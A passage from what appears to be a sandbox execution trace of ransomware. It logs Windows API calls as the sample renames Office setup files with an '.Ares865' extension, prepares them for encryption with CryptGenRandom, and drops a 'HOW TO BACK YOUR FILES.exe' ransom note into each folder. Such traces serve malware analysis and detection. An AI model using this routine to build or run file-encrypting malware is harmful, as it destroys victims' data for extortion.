controller\\office.en-us\\branding.xml.ares865"), dwFlags=0x1) returned 1 [0076.292] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.292] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=596341) returned 1 [0076.292] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.293] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.293] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.317] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.317] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.317] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.326] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.Ares865") returned 114 [0076.326] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.ares865"), dwFlags=0x1) returned 1 [0076.327] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.327] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=5557) returned 1 [0076.327] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.328] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.328] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.330] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.330] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.330] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.331] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.Ares865") returned 117 [0076.331] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.ares865"), dwFlags=0x1) returned 1 [0076.332] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\OfficeMUISet.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\officemuiset.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.332] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=819) returned 1 [0076.332] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.333] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.333] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.335] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.336] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.336] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.337] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.Ares865") returned 110 [0076.337] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.337] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.337] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=9352) returned 1 [0076.338] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.338] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.338] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.355] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.355] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.355] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.356] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us" [0076.356] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x319158 | out: hHeap=0x2b0000) returned 1 [0076.356] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0076.356] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us") returned 94 [0076.356] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us" [0076.356] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.356] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.361] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.362] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x112a3b30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5f059de0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f059de0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.362] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.362] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.362] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.Ares865") returned 118 [0076.362] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.ares865"), dwFlags=0x1) returned 1 [0076.363] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.363] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1231) returned 1 [0076.363] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.364] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.364] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.366] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.366] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.366] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.367] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.Ares865") returned 112 [0076.367] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.368] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.368] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1852) returned 1 [0076.369] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.369] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.369] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.371] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.372] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.372] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.373] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us" [0076.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x319090 | out: hHeap=0x2b0000) returned 1 [0076.373] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0076.373] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us") returned 92 [0076.373] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us" [0076.373] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.373] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.378] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.378] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd658ff0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f07ff40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f07ff40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.378] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.378] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.379] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.Ares865") returned 114 [0076.379] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.ares865"), dwFlags=0x1) returned 1 [0076.379] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\groovemui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.379] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=913) returned 1 [0076.380] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.380] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.380] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.383] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.383] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.383] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.384] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.Ares865") returned 110 [0076.384] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.385] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\groove.en-us\\setup.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0076.385] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1452) returned 1 [0076.385] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.386] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.386] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.388] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.389] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.389] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.389] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us" [0076.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0076.389] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0076.389] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us") returned 91 [0076.389] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us" [0076.389] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0076.389] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0076.393] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0076.393] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa64b3d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x5f0a60a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5f0a60a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0076.394] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0076.394] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0076.394] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.Ares865") returned 112 [0076.394] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.ares865"), dwFlags=0x1) returned 1 [0076.396] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\ExcelMUI.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\excelmui.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0076.396] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1565) returned 1 [0076.396] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0076.397] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0076.397] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.399] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f00d8) returned 1 [0076.400] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0076.400] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0076.400] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.Ares865") returned 109 [0076.400] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\excel.en-us\\setup.xml.ares865"), dwFlags=0x1) returned 1 [0076.401] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Excel.en-us\\SETUP.XML.Ares865" (normalized: "c:\\program files\\common 